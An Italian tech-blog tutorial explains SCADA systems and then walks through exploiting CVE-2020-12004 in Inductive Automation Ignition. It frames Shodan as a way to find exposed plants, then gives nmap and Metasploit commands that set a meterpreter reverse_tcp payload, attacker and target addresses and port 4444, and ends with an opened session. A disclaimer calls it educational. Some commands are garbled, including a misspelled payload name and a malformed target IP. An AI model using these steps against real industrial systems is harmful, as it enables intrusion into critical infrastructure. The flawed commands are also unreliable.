
Come accedere ad un impianto Scada senza credenziali
Cari lettori di Tecnogalaxy, oggi parleremo di sistemi SCADA, negli ultimi anni abbiamo sentito parlare spesso di questo termine abbinato all’industria 4.0.
Nell’ambito dei controlli automatici, l’acronimo SCADA indica un sistema informatico distribuito per il monitoraggio e la supervisione di sistemi fisici. Come potete ben capire i sistemi informatici distribuiti, offrono una gestione più efficiente di tutti i processi produttivi e industriali, non solo nelle grandi imprese ma anche in quelle piccole.
Con l’ausilio e il relativo collegamento a sensori e ad altri strumenti di misurazione installati tra i vari macchinari e anche altre strutture dellafabbrica, la tecnologia SCADA garantisce un controllo quasi totale al tecnico o all’ingegnere.
Con l’implementazione di questa gestione l’utilizzatore sarà in grado di gestire tutti gli impianti analizzando le performance anche se non si è presenti in loco, tutto questo da remoto.
Tramite una connessione protetta (una VPN), abbiamo già parlato di collegamenti in VPN in qualche articolo precedente, l’utilizzatore potrà accedere al pannello di controllo dell’impianto di produzione di propria competenza.
Cosa sono i sistemi SCADA
Quando parliamo di SCADA (acronimo di Supervisory Control And Data Acquisition) , ci riferiamo ad un sistema informatico che si occupa della supervisione raccogliendo dati ed effettuando il controllo di un impianto di produzione industriale.
Tutto questo come detto in precedenza senza essere fisicamente in sede, potenzialmente un utilizzatore potrebbe essere dall’altra parte del mondo, e semplicemente con un collegamento ad internet intervenire sul proprio impianto.
Caratteristiche principali di un sistema SCADA
Senza entrare nel dettaglio, le caratteristiche principali di un sistema SCADA sono:
- Fonte di dati
- Tutto sotto controllo
- Architettura aperta e flessibile.
- Controllo remoto
Perfetto adesso che sappiamo in generale cos’è un sistema SCADA, come tutti i sistemi collegati ad una rete e raggiungibili dall’esterno potrebbero essere vulnerabili se non protetti nel modo corretto e diventare un pericolo importante.
Nel nostro test andremo a vedere come un malintenzionato utilizzando semplicemente il portale Shodan può trovare sistemi SCADA vulnerabili e tentare di violarli utilizzando Kali Linux.
Ovviamente la stessa tecnica potremo utilizzarla per testare il nostro impianto e capire dove migliorarlo, come dico sempre, per proteggersi devi sapere come si attacca.
Iniziamo il nostro test andando a testare una vulnerabilità chiamata CVE-2020-12004 | Remote Code Execution, apriamo una shell e scriviamo il seguente comando:
sudo msfconsole
Recuperiamo l’indirizzi ip della macchina che vogliamo testare e proviamo ad eseguire una scansione con nmap
Apriamo un’altra shell e scriviamo il seguente comando:
sudo nmap –Pn 192.168.11.113
Come possiamo vedere la porta che interessa a noi per il test è la 8080/tcp ed è aperta, adesso ritorniamo nella shell aperta prima quella riferita a msfconsole, e scriviamo il comando:
search CVE-2020-12004
Adesso scriviamo il comando per utilizzare l’exploit:
use exploit/multi/scada/inductive_ignition_rce
Scriviamo info e confermiamo con l’invio per vedere il contenuto dell’exploit.
Procediamo con il nostro test, scriviamo il comando:
set payload windows/meterprete/reverse_tcp
Adesso dovremo scrivere il nostro indirizzo IP:
set LHOST 192.168.1.11 (il nostro indirizzo IP)
set LPORT 4444 (la porta che utilizzeremo)
Inseriamo l’indirizzo IP della macchina da testare, scrivendo il seguente comando:
set RHOST 192.168.145 (indirizzo IP da testare)
Scriviamo il comando:
check (per vedere se è vulnerabile).
Come possiamo vedere dal risultato, la macchina è attaccabile, non ci rimane che eseguire l’exploit scrivendo il comando:
exploit
Ecco il risultato, sessione aperta e targhet violato, a questo punto un malintenzionato potrebbe fare qualsiasi cosa sulla nostra macchina.
Pensate a quanto potrebbe essere pericoloso non avere le proprie macchine aggiogante e la security implementata nel modo corretto.
Come sempre fatene buon uso facendo dei test su vostri device / computer , farli su device/computer non vostri è illegale.
Al prossimo articolo 😊
N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.
Giorgio Perego
IT Manager
Leggi anche:
- Top 10 annunci avvenuti durante il WWDC
- Le 4 migliori app mobili per scommesse: caratteristiche, costi e utilizzo su iOS e Android
- Come riparare file video corrotti
- Come risparmiare sulla partita iva nel 2023
- ChatGPT potrebbe diventare senziente?
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
I PIÙ LETTI
ARTICOLI RECENTI